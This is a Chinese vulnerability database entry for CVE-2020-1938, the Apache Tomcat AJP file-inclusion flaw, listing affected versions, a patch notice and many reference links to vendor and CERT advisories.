正文

Apache Tomcat 输入验证错误漏洞

admin
admin V管理员 /0 评论 /9 阅读
0301
此篇文章发布距今已超过1169天,您需要注意文章的内容或图片是否可用!

漏洞信息详情

Apache Tomcat 输入验证错误漏洞

  • CNNVD编号:CNNVD-202002-1052
    • <!--
  • 危害等级: 超危-->
  • 危害等级: 超危
  • CVE编号: CVE-2020-1938
  • 漏洞类型: 输入验证错误
  • 发布时间: 2020-02-20
  • 威胁类型: 远程
  • 更新时间: 2021-08-13
  • 厂        商:
  • 漏洞来源: Red Hat,Team SafeS...

漏洞简介

Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。

Apache Tomcat 7.0.100之前的7.*版本、8.5.51之前的8.*版本和9.0.31之前的9.*版本中的Tomcat AJP协议存在文件包含漏洞。攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp 配置文件或源代码等。

漏洞公告

目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页:

http://tomcat.apache.org/

参考网址

来源:MLIST

链接:https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794@%3Cnotifications.ofbiz.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522@%3Cnotifications.ofbiz.apache.org%3E

来源:GENTOO

链接:https://security.gentoo.org/glsa/202003-43

来源:SUSE

链接:http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html

来源:CONFIRM

链接:http://support.blackberry.com/kb/articleDetail?articleNumber=000062739

来源:MLIST

链接:https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a@%3Cdev.tomee.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760@%3Cnotifications.ofbiz.apache.org%3E

来源:MLIST

链接:https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html

来源:MISC

链接:https://www.oracle.com/security-alerts/cpuoct2020.html

来源:MLIST

链接:https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e@%3Cusers.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c@%3Cusers.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194@%3Ccommits.tomee.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65@%3Cusers.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed@%3Cdev.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b@%3Cusers.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f@%3Cusers.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1@%3Cnotifications.ofbiz.apache.org%3E

来源:MISC

链接:https://www.oracle.com/security-alerts/cpujan2021.html

来源:MLIST

链接:https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6@%3Cdev.tomcat.apache.org%3E

来源:FEDORA

链接:https://lists.fedoraproject.org/archives/list/[email protected]/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG/

来源:DEBIAN

链接:https://www.debian.org/security/2020/dsa-4673

来源:MLIST

链接:https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9@%3Cusers.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97@%3Ccommits.tomee.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e@%3Cdev.tomee.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2@%3Cusers.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a@%3Cusers.tomee.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864@%3Cusers.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b@%3Cusers.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d@%3Cdev.tomcat.apache.org%3E

来源:DEBIAN

链接:https://www.debian.org/security/2020/dsa-4680

来源:MLIST

链接:https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3@%3Ccommits.tomee.apache.org%3E

来源:httpd.apache.org%3E

链接:httpd.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca@%3Cbugs.

来源:CONFIRM

链接:https://security.netapp.com/advisory/ntap-20200226-0002/

来源:MLIST

链接:https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db@%3Cnotifications.ofbiz.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1@%3Cusers.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7@%3Ccommits.ofbiz.apache.org%3E

来源:FEDORA

链接:https://lists.fedoraproject.org/archives/list/[email protected]/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS/

来源:FEDORA

链接:https://lists.fedoraproject.org/archives/list/[email protected]/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B/

来源:MLIST

链接:https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f@%3Cusers.tomcat.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb@%3Ccommits.tomee.apache.org%3E

来源:MLIST

链接:https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425@%3Cnotifications.ofbiz.apache.org%3E

来源:MLIST

链接:https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html

来源:MLIST

链接:https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda@%3Ccommits.tomee.apache.org%3E

来源:SUSE

链接:http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html

来源:MISC

链接:https://www.oracle.com/security-alerts/cpujul2020.html

来源:www.oracle.com

链接:https://www.oracle.com/security-alerts/cpujul2020.html

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1437/

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/156786/Red-Hat-Security-Advisory-2020-0855-01.html

来源:www.ibm.com

链接:https://www.ibm.com/blogs/psirt/security-bulletin-ibm-websphere-cast-iron-solution-app-connect-professional-is-affected-by-apache-tomcat-vulnerabilities-4/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.0667/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.0998/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.0867/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.2750/

来源:www.ibm.com

链接:https://www.ibm.com/blogs/psirt/security-bulletin-open-source-apache-tomcat-vulnerabilities-affect-ibm-tivoli-application-dependency-discovery-manager-cve-2020-1938-2/

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/158354/Red-Hat-Security-Advisory-2020-2840-01.html

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.3250/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1091/

来源:www.ibm.com

链接:https://www.ibm.com/blogs/psirt/security-bulletin-open-source-apache-tomcat-vulnerabilities-affect-ibm-tivoli-application-dependency-discovery-manager-cve-2020-1938/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1728/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1382/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1350/

来源:www.ibm.com

链接:https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-tomcat-affects-ibm-spectrum-protect-plus-cve-2020-1938/

来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2020-1938

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1887/

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/163798/Red-Hat-Security-Advisory-2021-3140-01.html

来源:www.ibm.com

链接:https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache-tomcat-affects-ibm-platform-symphony-2/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1388/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1465/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1028/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1565/

来源:www.huawei.com

链接:https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20200715-01-tomact-cn

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/158267/Red-Hat-Security-Advisory-2020-2783-01.html

来源:www.nsfocus.net

链接:http://www.nsfocus.net/vulndb/45940

来源:vigilance.fr

链接:https://vigilance.fr/vulnerability/Apache-Tomcat-code-execution-via-Enabled-AJP-Connector-31664

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/156827/Gentoo-Linux-Security-Advisory-202003-43.html

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.0826/

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/156858/Red-Hat-Security-Advisory-2020-0912-01.html

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.0799/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.2266/

来源:us-cert.cisa.gov

链接:https://us-cert.cisa.gov/ics/advisories/icsma-21-187-01

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.0963/

来源:www.oracle.com

链接:https://www.oracle.com/security-alerts/cpuoct2020.html

来源:mp.weixin.qq.com

链接:https://mp.weixin.qq.com/s/qIG_z9imxdLUobviSv7knw

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/157312/Red-Hat-Security-Advisory-2020-1520-01.html

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.2325/

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2021.2731

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1608/

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/161907/Apache-Ghostcat-Exploitation.html

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/157230/Red-Hat-Security-Advisory-2020-1478-01.html

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1747/

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/156781/Red-Hat-Security-Advisory-2020-0861-01.html

来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/ESB-2020.1983/

受影响实体

    暂无


补丁

  • Apache Tomcat 输入验证错误漏洞的修复措施
    <!--
    2020-2-20
    -->